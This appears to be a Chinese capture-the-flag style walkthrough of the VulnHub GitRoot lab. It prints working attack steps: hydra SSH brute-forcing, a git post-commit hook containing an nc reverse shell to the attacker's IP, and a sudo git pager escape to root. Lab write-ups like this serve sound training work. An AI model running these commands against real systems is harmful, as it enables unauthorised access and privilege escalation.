IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> OSCP-vulnhub:GitRoot靶机实战 -> 正文阅读

[PHP知识库]OSCP-vulnhub:GitRoot靶机实战

一、前言

主要利用方式:hydra 密码破解+git show 反弹shell获取平行账号权限+git 命令提权

二、靶机信息

??? 靶场: vulnhub.com

??? 靶机名称: GitRoot: 1

??? 难度: 高难度

??? 发布时间: 2020 年 6 月 3 日

??? 下载地址:https://www.vulnhub.com/entry/gitroot-1,488/

??? 备注:此靶场稍微有点困难,需要知晓git等若干使用方法及利用方式,踏坑无数。

三、虚拟机配置

这次采用的VirtualBox虚拟机,靶机设置了两个网卡,one:Host-Only,two:NAT,

攻击机(kali):NAT,DHCP服务:启用、IP地址:自动分配

这台靶机有点怪异,靶机生成Ip为:192.168.56.103.不在攻击机段里(10.0.2.15);

但通过ping 攻击机是可以ping 通靶机,宿主机访问也是可以ping 通靶机。

PS:在突破边界,反弹shell的时候,上述方法无法反弹shell,

??????? 最终解决方案为:vbox中,攻击机(kali)和靶机设置同样的网卡设置(两张网卡)

四、信息收集

1、靶机ip地址在启动时候,已经生成,通过测试,攻击机是可以ping通靶机

2、探测靶机ip端口开放情况

3、探测靶机开放端口的详细服务

4、从端口信息来看,22端口可以爆破,但是前提是要获取用户名,其他暂无漏洞;

11211端口可以使用telnet连接,但是没有任何意义;因此只能先从80端口下手。访问80端口。

直接访问发现告诉我们wp.gitroot.vuln域名下存在wordpress建站系统,我们直接在hosts目录下绑定域名,由于wp.gitroot.vuln是二级域名,我们在绑定wp子域名的同时,绑定主域名,这样在测试时,如果存在其他子域名我们也可以进行子域名爆破从而收集数据。

5、修改hosts文件,添加192.168.56.103 ?gitroot.vuln,顺便也把主域名绑定。

└─$ sudo vi /etc/hosts

└─cat /etc/host

6、在尝试破解 WP 没有成功后,尝试使用Gobuster工具的选项“?vhost?”和Kali 默认自带的“?big.txt ”字典列出更多子域。

└─$ gobuster vhost -u gitroot.vuln -w /usr/share/wordlists/dirb/big.txt

7、关注扫描结果:status:200,只剩下repo及wp,绑定host后访问repo.gitroot.vuln,按照提示,访问get.php 及set.php

8、两个文件无任何有效内容,遂对整体域名进行路径扫描

└─$ dirsearch -u repo.gitroot.vuln

9、通过访问,repo存在git路径,存在.git/一般都存在源码泄露

10、使用GitHack 工具,将代码拉到本地

11、通过查询,初步推测,有pablo、beth、jen或者带着_S3cret的账号,

五、漏洞利用

12、使用hydra 爆破密码,需要先将rockyou.txt.gz 解压,坑需注意

13、使用hydra 爆破 pablo的ssh密码(使用了kali自带的rockyou.txt文件)

└─$ hydra -l pablo -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.103

*在这个地方,暂且用几个密码小跑一下(爆破非常费时间,按照以往的靶机,爆破使用rockyou.txt的密码也是比较靠前的,看了一下其他人的教程,是爆破出来的)

用户名:pablo,密码:mastergitar

14、22端口ssh登录 ,获取第一个flag

└─$ ssh -p22 pablo@192.168.56.103

pablo@GitRoot:~$ id

pablo@GitRoot:~$ cat user.txt

flag:8a81007ea736a2b8a72a624672c375f9ac707b5e

15、在pablo目录下存在public文件夹及message文件。

16、使用find命令查找.git文件夹,第一个目录就是新的git repo

pablo@GitRoot:~/public$ find / -name .git 2>/dev/null

*2>/dev/null :把错误信息重定向到黑洞中,只留下正确的信息回显

17、进入并查看文件

pablo@GitRoot:/opt/auth/.git$ cd /opt/auth/.git/logs/refs/heads/

18、查看所有文件内容,在第414行发现一个添加用户的历史记录

pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ cat `ls` -n

?? 414? b2ab5f540baab4c299306e16f077d7a6f6556ca3 06fbefc1da56b8d552cfa299924097ba1213dd93 Your Name <you@example.com> 1590500148 -0400? commit: added some stuff

19、使用git show命令查看commit提交记录详情

pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ git show 06fbefc1da56b8d552cfa299924097ba1213dd93

20、里面有一个密码:?r3vpdmspqdb,用户名通过猜到,只有三个(可以查看/home目录下目录,)也可以通过之前git源码泄露得到的文件内容得知,还可以从靶机描述得知,然后再结合wp这个站点的管理员是beth,尝试一下ssh登录,发现可登录成功。在beth用户的home目录下,有一个public文件夹,发现txt文件,内容如下:

21、在beth目录下,新建.git/hooks文件夹,建一个post-commit文件,里面写入使用nc反弹shell的一句话,文件给777权限,再将.git文件夹压缩成zip格式,再给777权限

beth@GitRoot:/home$ cd beth

beth@GitRoot:~$ ls

beth@GitRoot:~$ mkdir -p .git/hooks

beth@GitRoot:~$ cd .git/hooks/

beth@GitRoot:~/.git/hooks$ vim post-commit

beth@GitRoot:~/.git/hooks$ cat post-commit

#! /bin/bash

/usr/bin/nc -e /bin/bash 192.168.56.102 5555

beth@GitRoot:~/.git/hooks$ chmod 777 post-commit

beth@GitRoot:~/.git/hooks$ cd /home/beth/

beth@GitRoot:~$ 7z a xshell.zip .git/

beth@GitRoot:~$ ls -l xshell.zip

-rw-r--r-- 1 beth beth 489 Jun? 6 11:16 xshell.zip

beth@GitRoot:~$ chmod 777 xshell.zip

beth@GitRoot:~$ ls -l xshell.zip

-rwxrwxrwx 1 beth beth 489 Jun? 6 11:16 xshell.zip

22、攻击机本地监听5555端口

23、复制压缩包到/home/jen/public/repos目录下

24、反弹shell,获取了jen的权限

25、利用python提权到tty交互式shell

26、cd 到jen目录下,查看是否存在敏感信息

jen@GitRoot:/home$ cd jen

jen@GitRoot:~$ ls -al

27、在jen目录.viminfo文件中发现一段可疑字符

# Search String History (newest to oldest):

?/binzpbeocnexoe

|2,1,1590471908,47,"binzpbeocnexoe"

六、提权

28、有密码,sudo提个权限看看,但依然不是root权限,并且提示了git。

en@GitRoot:~$ sudo -l

[sudo] password for jen: binzpbeocnexoe

29、使用sudo git 提权方式

jen@GitRoot:~$ sudo git -p help config

WARNING: terminal is not fully functional

-? (press RETURN)

30、接着在冒号后面输入:!/bin/sh,它将允许我们执行命令

??????? 最终输入 id 及查看root.txt文件,获取flag734ae32be131cd0681f86c03858f4f587a3c69ce

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-07-04 22:36:45  更:2022-07-04 22:36:56 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年3日历 -2024/3/29 19:32:45-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码